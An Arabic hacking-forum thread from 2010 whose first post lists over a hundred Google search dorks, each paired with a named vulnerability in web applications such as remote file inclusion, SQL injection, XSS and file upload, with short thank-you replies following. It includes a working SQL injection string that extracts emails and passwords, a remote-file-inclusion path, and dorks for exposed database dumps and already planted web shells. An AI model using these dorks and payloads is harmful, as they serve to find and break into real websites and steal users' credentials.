التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام



العودة   :: vBspiders Professional Network :: > [ ::. الـقرصـنـة والأختراق ~ The Hidden World Of Hackers .:: ] > قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات

إضافة رد
 
LinkBack أدوات الموضوع انواع عرض الموضوع
قديم 07-28-2010, 04:35 PM   رقم المشاركة : 1 (permalink)
معلومات العضو
 
الصورة الرمزية X HuNter
 

 

 
إحصائية العضو






X HuNter غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
X HuNter is on a distinguished road

Cool ثغرات في جوجل


بسم الله الرحمان الرحيم

:a21:

Dork: inurl:"/chat/phpMyChat.php3"
Link: phpMyChat v0.14.5 Multiple Vulnerabilities

--------------------------------------------------------------------------------

Dork: "powered by talkback"
Author: civi
Link: TalkBack 2.2.7 Remote File Include Vulnerability

--------------------------------------------------------------------------------

Dork: "Total members:" AND "Paid out:" AND "Redeemed:"
Author: fuzion
Link: Amber Script 1.0 (show_content.php id) Local File Inclusion Vulnerability

--------------------------------------------------------------------------------

Dork: inurl:Commence intitle:"Commence Conference System"
Author: fuzion
Link: IAPR COMMENCE 1.3 Multiple Remote File Inclusion Vulnerability

--------------------------------------------------------------------------------

Dork: inurl:"/hp/device/this.LCDispatcher"


--------------------------------------------------------------------------------

Dork: intitle:"Broadband Router Status"


--------------------------------------------------------------------------------

Dork: "Powered by SHP"
Author: civi
Link: Sciurus Hosting Panel Code Inject Exploit

--------------------------------------------------------------------------------

Dork: "Powered by icebb"
Author: civi
Link: IceBB 1.0-rc6 - Database Authentication Details Exploit

--------------------------------------------------------------------------------

Dork: "Powered by ExoPHPDesk v1.2.1"
Link: ExoPHPDesk Index.PHP Multiple Input Validation Vulnerabilities

--------------------------------------------------------------------------------

Dork: "Powered by GuppY"
Link: GuppY Error.PHP Remote File Include and Command Execution Vulnerability

--------------------------------------------------------------------------------

Dork: "MySQL Administrator dump" filetype:sql


--------------------------------------------------------------------------------

Dork: intitle:"Helios Calendar Event Management System"
Author: Maximiliano Soler
Link: Helios Calendar <=1.2.1 Beta (XSS) Multiple Remote Vulnerabilities

--------------------------------------------------------------------------------

Dork: intext:Powered by UebiMiau! intitle:uebimiau inurl:/webmail/index.php?lid=
Author: Maximiliano Soler
Link: UebiMiau <=2.7.x (XSS) Multiple Remote Vulnerabilities

--------------------------------------------------------------------------------

Dork: intext:"Powered by MailBee WebMail"
Author: Maximiliano Soler
Link: MailBee WebMail Pro <=3.4 (XSS) Multiple Remote Vulnerabilities

--------------------------------------------------------------------------------

Dork: intext:"Powered by SocketKB version"
Author: Maximiliano Soler
Link: SocketKB <=1.1.5 (XSS) Multiple Remote Vulnerabilities

--------------------------------------------------------------------------------

Dork: inurl:"/info.php?reason=link" intitle:"BlaB!"
Author: Maximiliano Soler
Link: BlaB! Chat < 3.3 (XSS) Multiple Remote Vulnerabilities

--------------------------------------------------------------------------------

Dork: inurl:"setup-config.php" intitle:"WordPress * Setup"


--------------------------------------------------------------------------------

Dork: intitle:"Micro Login System" inurl:login.php
Link: Micro Login System v1.0 Password Disclosure

--------------------------------------------------------------------------------

Dork: inurl:"efileman.cgi"
Link: eFileman Remote File Upload Vulnerability

--------------------------------------------------------------------------------

Dork: intext:"MySQL-Dump" "Host: localhost" filetype:sql


--------------------------------------------------------------------------------

Dork: intext:"PostgreSQL database dump" filetype:sql


--------------------------------------------------------------------------------

Dork: intext:"phpBB Backup Script" filetype:sql


--------------------------------------------------------------------------------

Dork: intext:"phpMyAdmin MySQL-Dump" filetype:sql


--------------------------------------------------------------------------------

Dork: "Powered by ReloadCMS 1.2.5"
Link: ReloadCMS Index.PHP Local File Include Vulnerability

--------------------------------------------------------------------------------

Dork: intitle:"Index of" intext:"LiteSpeed Web Server at"
Link: LiteSpeed Remote Mime Type Injection

--------------------------------------------------------------------------------

Dork: intitle:"SiteBar" inurl:command
Link: SiteBar Command.PHP Cross-Site Scripting Vulnerability

--------------------------------------------------------------------------------

Dork: "Powered by rnote" inurl:"rnote.php"
Link: rNote rnote.PHP Multiple Cross Site Scripting Vulnerabilities

--------------------------------------------------------------------------------

Dork: CMS von artmedic webdesign
Author: iNs
Link: artmedic CMS Local File Inclusion

--------------------------------------------------------------------------------

Dork: com_wmtrssreader
Author: civi
Link: wmtrssreader joomla component 1.0 Remote File Include Vulnerability

--------------------------------------------------------------------------------

Dork: com_swmenufree
Author: civi
Link: Joomla! swMenuFree 4.6 Component Remote File Include

--------------------------------------------------------------------------------

Dork: com_mambocredits
Author: civi
Link: com_mambocredits Remote File Incluison

--------------------------------------------------------------------------------

Dork: "Powered by Tikiwiki"
Author: civi
Link: TikiWiki 1.9.8 Remote PHP Injection Vulnerability

--------------------------------------------------------------------------------

Dork: "Powered by lightblog"
Author: civi
Link: LightBlog 8.4.1.1 Remote Code Execution Exploit

--------------------------------------------------------------------------------

Dork: "Powered by Cart32" inurl:cart32.exe -Demo
Link: Cart32 GetImage Arbitrary File Download Vulnerability

--------------------------------------------------------------------------------

Dork: "Powered by DRBGuestbook"
Link: DRBGuestbook Remote XSS Vulnerability

--------------------------------------------------------------------------------

Dork: "Powered by actsite"
Author: civi
Link: actSite v1.991 Beta (base.php) Remote File Inclusion

--------------------------------------------------------------------------------

Dork: "Powered by MDPro"
Link: MDPro 1.0.76 Remote SQL Injection Exploit

--------------------------------------------------------------------------------

Dork: "Powered by mxBB"
Link: mxBB Module mx_glance 2.3.3 Remote File Include Vulnerability

--------------------------------------------------------------------------------

Dork:
1) "Powered by phpBB" inurl:"faq.php?mode=openid"
2) "Powered by phpBB" openid
Author: salentinohack
Link: phpBB Mod OpenID 0.2.0 BBStore.php Remote File Inclusion Vuln

--------------------------------------------------------------------------------

Dork: "integramod nederland(s)"
Author: civi
Link: IntegraMOD Nederland 1.4.2 Remote File Inclusion Vulnerability

--------------------------------------------------------------------------------

Dork: "Powered by ActiveKB Knowledgebase Software"
Author: salentinohack
Link: ActiveKB Knowledgebase 2.? (catId) Remote SQL Injection Vulnerability

--------------------------------------------------------------------------------

Dork:
1) "Powered by Nuke-Evolution" intitle:NukeSentinel
2) inurl:/modules.php?name=NukeSentinel
Link: NukeSentinel 2.5.05 (nsbypass.php) Blind SQL Injection Exploit

--------------------------------------------------------------------------------

Dork:
1) "Powered by Xcms"
2) inurl:"/index.php?lng=it" "Amministrazione sito"
Link: XCMS Arbitrary Command Execution Vuln

--------------------------------------------------------------------------------

Dork: "Powered by phpBB XS" inurlCant See Imagesrofile.php
Link: phpBB XS Profile.PHP HTML Injection Vulnerability

--------------------------------------------------------------------------------

Dork: "Powered by SimplePHPBlog"
Link: SimplePHPBlog img_upload_cgi.php Arbitrary File Upload Vulnerability

--------------------------------------------------------------------------------

Dork: "Powered by PhpWebGallery" inurlCant See Imagesicture.php
Link: PhpWebGallery Picture.PHP HTML Injection Vulnerability

--------------------------------------------------------------------------------

Dork: "Powered by Phormer"
Link: Phormer Index.PHP Multiple Cross-Site Scripting Vulnerabilities

--------------------------------------------------------------------------------

Dork:
1) "Powered by iziContents"
Author: civi
Link: iziContents <= RC6 (RFI/LFI) Multiple Remote Vulnerabilities

--------------------------------------------------------------------------------

Dork:
1) "Powered by phpBB2 Plus"
2) inurl:"/phpBBplus/*.php" filetypeCant See Imageshp
Link: phpBB Plus <= 1.53 (phpbb_root_path) Remote File Inclusion Vuln

--------------------------------------------------------------------------------

Dork:
1) intitle:"styles demo" "Powered by phpBB"
2) inurl:/styles_demo/index.php
Link: StylesDemo Mod for phpbb 2.0.xx Multiple Vulnerabilites

--------------------------------------------------------------------------------

Dork: intext:"R?is?vec KwsPHP"
Link: KwsPHP version 1.0 suffers from a remote SQL injection vulnerability the stats module.

--------------------------------------------------------------------------------

Dork: inurl:"/jblog/index.php"
Link: JBlog 1.0 (index.php id) Remote SQL Injection Exploit

--------------------------------------------------------------------------------

Dork: inurl:"/webquest/soporte_derecha_w.php"
Link: PHP Webquest <= 2.5 (id_actividad) Remote SQL Injection Exploit

--------------------------------------------------------------------------------

Dork: "Powered by GForge"
Link: GForge < 4.6b2 (skill_delete) Remote SQL Injection Vulnerability

--------------------------------------------------------------------------------

Dork: "Powered by TinyWebGallery"
Link: TinyWebGallery Multiple Cross-Site Scripting Vulnerabilities

--------------------------------------------------------------------------------

Dorks: inurl:"/customer/product.php?" X-cart
Author: hip
Link: X-Cart <= ? Multiple Remote File Inclusion Vulnerabilities

--------------------------------------------------------------------------------

Dork: inurl:/xcart/home.php
Link: X-Cart <= ? Multiple Remote File Inclusion Vulnerabilities

--------------------------------------------------------------------------------

Dorks:
1) "Powered by phpmytourney"
2) inurlCant See Imageshpmytourney
3) inurlCant See Images_signup.php
Author: civi
Link: phpMytourney (functions_file) Remote File Inclusion Vulnerability

--------------------------------------------------------------------------------

Dork: intext:"anyInventory 1.9" intitle:anyInventory
Link: AnyInventory => 1.9.1 Remote file inclusion

--------------------------------------------------------------------------------

Dork: intitle:"Calendar: A JSP APPLICATION"
Link: Apache Tomcat version 4.1.31 XSS Vuln.

--------------------------------------------------------------------------------

Dork: intext:" Powered by myBloggie"
Link: MyBloggie Trackback.PHP Multiple SQL Injection Vulnerabilities

--------------------------------------------------------------------------------

Dork: intext:"Powered by Claroline * 2001"
Link: Claroline Local File Include and Cross-Site Scripting Vulnerabilities

--------------------------------------------------------------------------------

Dork: intitle:"Webboard Powered by : 212cafe.com"
Link: 212cafe Webboard Read.PHP SQL Injection Vulnerability

--------------------------------------------------------------------------------

Dork: "Powered by Weblogicnet"
Link: Weblogicnet (files_dir) Remote File Inclusion

--------------------------------------------------------------------------------

Dork: inurl:index.php?option=com_content intitle:"Joomla* powered Site"
Link: Joomla! 1.5 Beta1/Beta2 SQL Injection Exploit

--------------------------------------------------------------------------------

Dork: inurl:Tiki-Remind_Password.PHP
Link: Tikiwiki Tiki-Remind_Password.PHP Cross-Site Scripting Vulnerability

--------------------------------------------------------------------------------

Dork: inurl:category.php?manufacturer_id=
Link: CKGold Shopping Cart 2.0 (category.php) Blind SQL Injection Exploit

--------------------------------------------------------------------------------

Dork: inurl:/phpBB2/links.php OR inurl:/forum/links.php "Powered by phpBB"
Link: phpBB <= 2.0.22 - Links MOD <= v1.2.2 Remote SQL Injection Exploit

--------------------------------------------------------------------------------

Dork: intext:"Powered by DeskPRO" "Login / Create" OR "Login to Your Account"
Link: 1) DeskPRO Admin Panel Multiple HTML Injection Vulnerabilities
Link: 2) DeskPRO Admin Panel Multiple HTML Injection Vulnerabilities

--------------------------------------------------------------------------------

Dork: "ABC eStore * Zakkis Tech"
Link: ABC estore 3.0 (cat_id) Blind SQL Injection

--------------------------------------------------------------------------------

Dork: "ABC eStore * Zakkis Tech"
Link: ABC estore 3.0 (cat_id) Blind SQL Injection

--------------------------------------------------------------------------------

Dork: "Powered by xGB 2.0"
Link: xGB 2.0 (xGB.php) Remote Permission Bypass Vulnerability

--------------------------------------------------------------------------------

Dork: inurl:vwar/news.php
Author: civi
Link: VWar <= v1.5.0 R15 (mvcw.php) Remote File Inclusion

--------------------------------------------------------------------------------

Dork: "Powered by 'SunShop Shopping Cart'"
Link: SunShop v4.0 RC 6 (search) Blind SQL Injection

--------------------------------------------------------------------------------

Dork: intext:"propuls?ar SPIP"
Link: SPIP Inc-Calcul.PHP3 Remote File Include Vulnerability

--------------------------------------------------------------------------------

Dork:
1) "Powered by Olate Download" inurl:download.php
2) intitle:"Olate Download - Error"

Link: Olate Download Download.PHP Multiple SQL Injection Vulnerabilities

--------------------------------------------------------------------------------

Dork: "Powered by LiteCommerce: ecommerce software"
Link: LiteCommerce Multiple SQL Injection Vulnerabilities

--------------------------------------------------------------------------------

Dork: intitle:"Powered By phUploader"
Link: phUploader phUploader.PHP Arbitrary File Upload Vulnerability

--------------------------------------------------------------------------------

Dork: "Powered by Squirrelcart * PHP Shopping Cart Software"
Link: Squirrelcart Popup_Window.PHP Remote File Include Vulnerability

--------------------------------------------------------------------------------

Dork: intext:"Dalai Forum v1*"
Link: Dalai Forum Forumreply.PHP Local File Include Vulnerability

--------------------------------------------------------------------------------

Dork: intext:"Powered by GetMyOwnArcade.com."
Link: GetMyOwnArcade Search.PHP SQL Injection Vulnerability

--------------------------------------------------------------------------------

Dork: intext:"Powered by EZPhotoSales" intitle:"Online Viewing"
Link: EZPhotoSales Multiple Input Validation Vulnerabilities

--------------------------------------------------------------------------------

Dork: intext:"Powered by Article Dashboard"
Link: Article Dashboard Multiple Input Validation Vulnerabilities

--------------------------------------------------------------------------------

Dork: intext:"Powered by DeskPRO" inurl: login.php
Link: DeskPRO Admin Panel Multiple HTML Injection Vulnerabilities

--------------------------------------------------------------------------------

Dork: inurl:"/go/_files/?file="
Author: dun
Link: SOTEeSKLEP Remote File Disclosure Vulnerability

--------------------------------------------------------------------------------

Dork:
1) intext:"Created by phpSysInfo" inurl: index.php
2) intitle:"System Information" intext:"Created by phpSysInfo"

Link: phpSysInfo Index.php Cross-Site Scripting Vulnerability

--------------------------------------------------------------------------------

Dork: inurl:"/detail.asp?iPro" intext:"Year: *. Date:"
Link: AutoDealer Detail.ASP SQL Injection Vulnerability

--------------------------------------------------------------------------------

Dork:
1) intitle:"- LinPHA" inurl:new_images.php
2) intext:"Powered by LinPHA"

Link: LinPHA <= 1.3.1 (new_images.php) Remote Blind SQL Injection

--------------------------------------------------------------------------------

Dork:
1) intext:"Powered by Philboard" intitle:"Philboard"
2) inurlCant See Imageshilboard_forum.asp -sql

Link: Metyus Forum Portal v1.0 philboard_forum.asp (id) Sql Injection

--------------------------------------------------------------------------------

Dork: intitle:xoops inurl:/modules/xfsection/
Author: civi
Link: XOOPS Module XFsection Remote File Inclusion

--------------------------------------------------------------------------------

Dork:
1) intext:"Powered by Nukedit"
2) "Powered by Nukedit" inurl:"login.asp"

Link: Nukedit Login.ASP Cross-Site Scripting Vulnerability

--------------------------------------------------------------------------------

Dork: intext:"Built with FORMfields" inurl:/adMan/
Link: FORMfield Secure Login.PHP Multiple Cross-Site Scripting Vulnerabilities

--------------------------------------------------------------------------------

Dork: intitle:"The Text Ad Marketplace"
Link: AlstraSoft Text Ads Enterprise Multiple Cross-Site Scripting Vulnerabilities

--------------------------------------------------------------------------------

Dork: intext:"powered by philboard" -SQL
Link: W1L3D4 Philboard v0.3 XSS Vulnerability

--------------------------------------------------------------------------------

Dork:
1) intext:"Powered by Webspell"
2) intitle:"webSPELL v4.0"

Link: Webspell 4.x Local File Inclusion (Win)

--------------------------------------------------------------------------------

Dork: intitle:"Confixx Professional" intext:Login"
Link: Confixx <= PRO 3.3.1 Remote File Inclusion Vulnerability

--------------------------------------------------------------------------------

Dork: intext:"Powered by UseBB"
Link: UseBB version: 1.0.7 Cross Site Scripting (XSS)

--------------------------------------------------------------------------------

Dork:
1) inurl:"us/index.php?option=com_remository
2) intitle:"* ReMOSitory"
Author: xdfsd45oi
Link: Mambo Remository Component <= 3.25 Remote Include Vulnerability

--------------------------------------------------------------------------------

Dork: "Powered By Vivvo CMS"
Link: Vivvo CMS <= 3.4 (index.php) Remote BLIND SQL Injection Exploit

--------------------------------------------------------------------------------

Dork: allinurl:bemarket
Author: mozi
RFI Exploit:
/bemarket/postscript/postscript.php?p_mode=evilscipt

--------------------------------------------------------------------------------

Dork: intitle:"dig up the stats"
Link: Traffic Stats SQL Injection Vulnerbility

--------------------------------------------------------------------------------

Dork:
1) inurlCant See Imagesafiledb.php?action=search
2) intext:"Powered by paFileDB" intitleCant See ImagesaFileDB
Link: paFileDB 3.6 (search.php) Remote SQL Injection Vulnerability

--------------------------------------------------------------------------------

Dork: allinurl:directory.php?ax=list
Author: proxyakabran
SQL Injection:
/directory.php?ax=list&sub=1&cat_id=-1/**/UNION/**/SELECT/**/1,2,3,4,concat(0x2D2D3E, email,0x3a,password),6,7,8,9,10,0x223E3C212D2D,12, 13/**/from/**/links/*

--------------------------------------------------------------------------------

Dork: intitle:"SiteScape Forum Login"
Link: SiteScape Forum Multiple Unspecified Cross-Site Scripting Vulnerabilities

--------------------------------------------------------------------------------

Dork: inurl:"mimic2.cgi"
Link: Mimicboard2 Mimic2.Dat Unauthorized Access Vulnerability

--------------------------------------------------------------------------------

Dork: intext:"Powered by Calendar Express 2"
Link: Calendar Express Multiple SQL Injection Vulnerabilities

--------------------------------------------------------------------------------

Dork: intext:"Powered by Discus" inurl:/discus/
Link: DiscusWare Discus Error Message Cross-Site Scripting Vulnerability

--------------------------------------------------------------------------------

Dork: intext:"Powered by WebMatic" (only 99 results)
Link: Webmatic Multiple SQL Injection Vulnerabilities

--------------------------------------------------------------------------------

Dork: intext:"Powered by MKPortal"
Link: MkPortal Multiple SQL Injection Vulnerabilities

--------------------------------------------------------------------------------

Dork: inurl:mailmachine.cgi intext:"Mail Machine v3" (only 11 results)
Link: Mail Machine Local File Include Exploit

--------------------------------------------------------------------------------

Dork: inurlCant See Imagesictionary.aspx intitleCant See Imagesictionary.aspx
Link: HomestayFinder's Dictionary.aspx XSS vuln.

--------------------------------------------------------------------------------

Dork: ":80" ":8080" -intext:a* filetype:txt
Author: florence
Finds lists of proxies.

--------------------------------------------------------------------------------

Dork: intitle:"Aigaion * Please login" *(only 6 found)
Link: Aigaion <= 1.3.3 SQL Injection Exploit

--------------------------------------------------------------------------------

Dork: inurl:htmltonuke.php?
Link: PHP-Nuke RFI Exploit

--------------------------------------------------------------------------------

Dork: "Powered by PHP Director" inurl:videos.php
Link: PHP Director Videos.PHP SQL Injection Vulnerability

--------------------------------------------------------------------------------

Dork: intitle:"phpwcms ** web based content management system"
Link: PHPWCMS Multiple Remote File Include Vulnerabilities

--------------------------------------------------------------------------------

Dork: intext:"powered by easybe." (only 6 results)
Link: Easybe 1-2-3 Music Store Process.PHP Script SQL Injection Vulnerability

--------------------------------------------------------------------------------

Dork: intext:"phpBook Ver" inurl:guestbook.php intitle:"Guestbook"
Link: NETonE PHPBook Guestbook.PHP Cross Site Scripting Vulnerability

--------------------------------------------------------------------------------

Dork: intext:"Login to Webmin" inurl:10000
Link: Webmin Pam_Login.CGI Multiple Unspecified Cross-Site Scripting Vulnerabilities

--------------------------------------------------------------------------------

Dork: inurl:"spellchecktext.php" OR inurl:"spellcheckwindow.php" (only 10 results)
Link: SPHPell Multiple Remote File Include Vulnerabilities

--------------------------------------------------------------------------------

Dork:
1) inurl:index.php?name=PNphpBB2 inurl:viewforum
2) intext:"Powered by PNphpBB2"
Link: PNphpBB2 "viewforum.php" SQL Injection Blind Password Hash Fishing Exploit

--------------------------------------------------------------------------------

Dork: intext:"Powered by EQdkp" inurl:"login.php"
Link: EQDKP Login.PHP Arbitrary Variable Overwrite Vulnerability

--------------------------------------------------------------------------------

Dork: "Powered by Wheatblog"
Link: Wheatblog Login SQL Injection Vulnerability

--------------------------------------------------------------------------------

Dork: intitle:"phpEventCalendar: Event Display"
Link: phpEventCalendar <= v0.2.3 SQL Injection Exploit

--------------------------------------------------------------------------------

Dork: inurl:forum.php "Powered by VBZooM"
Link: vbzoom 1.x (forum.php MainID) Remote SQL Injection Vulnerabilities

--------------------------------------------------------------------------------

Dork: intitle:c99shell filetypeCant See Imageshp


--------------------------------------------------------------------------------

Dork: intitle:"WebChat" inurl:"/webchat/login.php
Link: WebChat 0.78 (login.php rid) Remote SQL Injection Vulnerability

--------------------------------------------------------------------------------

Dork: intext:"powered by e107" inurl:signup.php
Link: E107 Signup.PHP Arbitrary File Upload Vulnerability

--------------------------------------------------------------------------------

Dork: intitle:"phpTrafficA ** web statistics"
Link: phpTrafficA <= 1.4.2 (pageid) Remote SQL Injection Vulnerability

--------------------------------------------------------------------------------

Dork: intitle:"Welcome to LMS" intext:"Please login"
Link: LMS - LAN Management System 1.9.6 - RFI

--------------------------------------------------------------------------------

Dork: intitle:"Blackboard Academic Suite"
Link: Blackboard Products Multiple HTML Injection Vulnerabilities

--------------------------------------------------------------------------------

Dork: intitle:"Blackboard Learning System" inurl:/login/
Link: Blackboard Products Multiple HTML Injection Vulnerabilities

--------------------------------------------------------------------------------

Dork: intext:"Powered by WMS-CMS" inurl:default.asp
Link: WMSCMS Multiple Cross Site Scripting Vulnerabilities

--------------------------------------------------------------------------------

Dork: inurl:/xmlrp.php intext:"Warning:" intext:"wp-config.php"
Link: Wordpress 2.2 (xmlrpc.php) Remote SQL Injection Exploit

--------------------------------------------------------------------------------

Dork: intext:"Software PBLang" inurl:"login.php "intitle:log in"
Link: PBLang <= 4.67.16.a Remote Code Execution Exploit

--------------------------------------------------------------------------------

Dork: intext:Powered by EQdkp inurl:listmembers.php
Link: EQdkp <= 1.3.2 SQL Injection Exploit

--------------------------------------------------------------------------------

Dork: intitle:sendcard - a PHP postcard script using a database to store the cards"
Link: Sendcard <= 3.4.1 Remote Code Execution Exploit

--------------------------------------------------------------------------------

Dork: inurl:/cpCommerce/category.php
Link: cpCommerce <= 1.1.0 (category.php id_category) Remote SQL Injection Exploit

--------------------------------------------------------------------------------

Dork: intext:"Powered by Particle Gallery"
Link: Particle Gallery Search.PHP Cross-Site Scripting Vulnerability

--------------------------------------------------------------------------------

Dork: intext:"Powered by Particle Blogger"
Link: Particle Blogger Archives.PHP SQL Injection Vulnerability

--------------------------------------------------------------------------------

Dork: OTRS :: Login intext:"Powered by OTRS"
Link: OTRS Index.PL Cross-Site Scripting Vulnerability

--------------------------------------------------------------------------------

Dork: intext:"Vistered Little Theme by"
Link: Vistered Little 1.6a Remote File Disclosure Vulnerability

--------------------------------------------------------------------------------

Dork: intext:Powered by phpCodeur © 2002–2006 | Wanewsletter
Link: WAnewsletter-2.1.3 (newsletter.php) RFI Vul

--------------------------------------------------------------------------------

Dork: intitleCant See ImageshpPgAdmin - Login
Link: ********** code Injection in phpPgAdmin

--------------------------------------------------------------------------------

Dork: intext:SquirrelMail Login
Link: SquirrelMail Multiple Cross Site Scripting Vulnerabilities

--------------------------------------------------------------------------------

Dork: intext:Powered by Geeklog inurl:album.php
Link: Media Gallery =>v1.4 Remote file inclusion

--------------------------------------------------------------------------------

Dork: Powered By Pligg intext:Beta 9 / Login
Link: Pligg Reset Forgotten Password Security Bypass Vulnerability

--------------------------------------------------------------------------------

Dork: mailto:*@aol.com
Helps find usernames on a certain domain, replace aol.com

--------------------------------------------------------------------------------

Dork: intext:GNUTURK PORTAL inurl:Mods.PHP
Link: GNUTurk Mods.PHP Cross Site Scripting Vulnerability

--------------------------------------------------------------------------------




eyvhj td [,[g

التوقيع

http://img163.imageshack.us/img163/6...3303889100.jpg

 

   

رد مع اقتباس
قديم 07-28-2010, 05:01 PM   رقم المشاركة : 2 (permalink)
معلومات العضو
 
الصورة الرمزية the sn!per
 

 

 
إحصائية العضو







the sn!per غير متواجد حالياً

إرسال رسالة عبر MSN إلى the sn!per

 

 

إحصائية الترشيح

عدد النقاط : 10
the sn!per is on a distinguished road

افتراضي


[align=center][/align]مشــــــــــــــكور اخي واصل ابداعكــ

التوقيع

الا بذكر الله تطمئن القلوب

http://www.saaid.net/twage3/009.jpg

Sniper99@vip.cn

 

   

رد مع اقتباس
قديم 07-28-2010, 05:07 PM   رقم المشاركة : 3 (permalink)
معلومات العضو
 
الصورة الرمزية loulou
 

 

 
إحصائية العضو







loulou غير متواجد حالياً

إرسال رسالة عبر MSN إلى loulou إرسال رسالة عبر Skype إلى loulou

 

 

إحصائية الترشيح

عدد النقاط : 10
loulou is on a distinguished road

افتراضي


merci

التوقيع

http://up.top4top.net/uploads/2012/0...1d89065f71.gif


http://www.panoora.com/2min.htm

http://img199.imageshack.us/img199/7...y204978167.gif

http://www.mp3quran.net

 

   

رد مع اقتباس
قديم 07-28-2010, 06:11 PM   رقم المشاركة : 4 (permalink)
معلومات العضو
 
إحصائية العضو






الشبح المرح غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
الشبح المرح is on a distinguished road

افتراضي


الروابط غير شغالة

التوقيع







 

   

رد مع اقتباس
قديم 07-28-2010, 07:56 PM   رقم المشاركة : 5 (permalink)
معلومات العضو
 
الصورة الرمزية alaacol
 

 

 
إحصائية العضو






alaacol غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
alaacol is on a distinguished road

افتراضي


[align=center]هذول ثغرات حض يا نصيب [/align]

   

رد مع اقتباس
قديم 08-05-2014, 05:03 AM   رقم المشاركة : 6 (permalink)
معلومات العضو
 
الصورة الرمزية SQL
 

 

 
إحصائية العضو





SQL غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
SQL is on a distinguished road

افتراضي رد: ثغرات في جوجل


شكراً
اريد المشاركة فقط لكتابة موضوع

   

رد مع اقتباس
قديم 08-26-2014, 12:37 AM   رقم المشاركة : 7 (permalink)
معلومات العضو
 
الصورة الرمزية alfa hacker
 

 

 
إحصائية العضو







alfa hacker غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
alfa hacker is on a distinguished road

افتراضي رد: ثغرات في جوجل


هده دوركات يا اخي هي فقط تبحت لك عن الصفحة المطلوبة بواسطة عنوان الوسم <title>
,ليست تغرات):

   

رد مع اقتباس
قديم 01-04-2015, 11:51 PM   رقم المشاركة : 8 (permalink)
معلومات العضو
 
الصورة الرمزية hichamou10
 

 

 
إحصائية العضو







hichamou10 غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
hichamou10 is on a distinguished road

افتراضي رد: ثغرات في جوجل


خبر جميل

   

رد مع اقتباس
قديم 01-07-2015, 10:37 PM   رقم المشاركة : 9 (permalink)
معلومات العضو
 
إحصائية العضو







المقاتل الصنديد غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
المقاتل الصنديد is on a distinguished road

افتراضي رد: ثغرات في جوجل


مجهود طيب احسنت ♥

   

رد مع اقتباس
قديم 01-16-2015, 01:58 AM   رقم المشاركة : 10 (permalink)
معلومات العضو
 
الصورة الرمزية mohamed80
 

 

 
إحصائية العضو







mohamed80 غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
mohamed80 is on a distinguished road

افتراضي رد: ثغرات في جوجل


merciiiii

   

رد مع اقتباس
قديم 01-23-2015, 12:50 AM   رقم المشاركة : 11 (permalink)
معلومات العضو
 
الصورة الرمزية mr.hacker124
 

 

 
إحصائية العضو







mr.hacker124 غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
mr.hacker124 is on a distinguished road

افتراضي رد: ثغرات في جوجل


ty

   

رد مع اقتباس
قديم 10-18-2016, 09:34 PM   رقم المشاركة : 12 (permalink)
معلومات العضو
 
الصورة الرمزية hank00sh
 

 

 
إحصائية العضو








hank00sh غير متواجد حالياً

إرسال رسالة عبر MSN إلى hank00sh

 

 

إحصائية الترشيح

عدد النقاط : 11
hank00sh is on a distinguished road

افتراضي رد: ثغرات في جوجل


يعطيك الف عافيه وبارك الله فيك

التوقيع

لا اله الا الله محمد رسول الله استغفر الله واتوب اليه

استغفر الله

استغفر الله

استغفر الله

HaNkOoSh HaCkEr

 

   

رد مع اقتباس
قديم 11-21-2016, 08:02 PM   رقم المشاركة : 13 (permalink)
معلومات العضو
 
الصورة الرمزية Xd.Black
 

 

 
إحصائية العضو






Xd.Black غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
Xd.Black is on a distinguished road

افتراضي رد: ثغرات في جوجل


حبيبي واصل

   

رد مع اقتباس
قديم 01-14-2017, 08:46 AM   رقم المشاركة : 14 (permalink)
معلومات العضو
 
إحصائية العضو







Al-Moutamarid غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
Al-Moutamarid is on a distinguished road

افتراضي رد: ثغرات في جوجل


(yy)

   

رد مع اقتباس
قديم 01-31-2017, 02:55 PM   رقم المشاركة : 15 (permalink)
معلومات العضو
 
الصورة الرمزية arabboy
 

 

 
إحصائية العضو






arabboy غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
arabboy is on a distinguished road

افتراضي رد: ثغرات في جوجل


شكرا اخى جزاك اللة

   

رد مع اقتباس
إضافة رد

مواقع النشر (المفضلة)


تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة

الانتقال السريع

المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
دورة اكتشاف ثغرات الفايل انكلود + ثغرات xss وفحص ملفات php بالصو [حصـري]ر remoter حقن xss - ssi 39 12-12-2014 01:24 AM
[ خبـر ] : جوجل فلسطين وليس الى جوجل الأراضي الفلسطينية support قسم ستآيلات الـ vB 1 08-22-2009 09:58 PM
[Product] : وثيقه جوجل ادسنس هام لكل مستخدمي جوجل ادسنس بدون تعديل اي قوالب واضافه برمجه MARCO1 xman2 قســم تطويــر المــــواقع 0 05-06-2009 03:54 AM


الساعة الآن 06:34 PM


[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0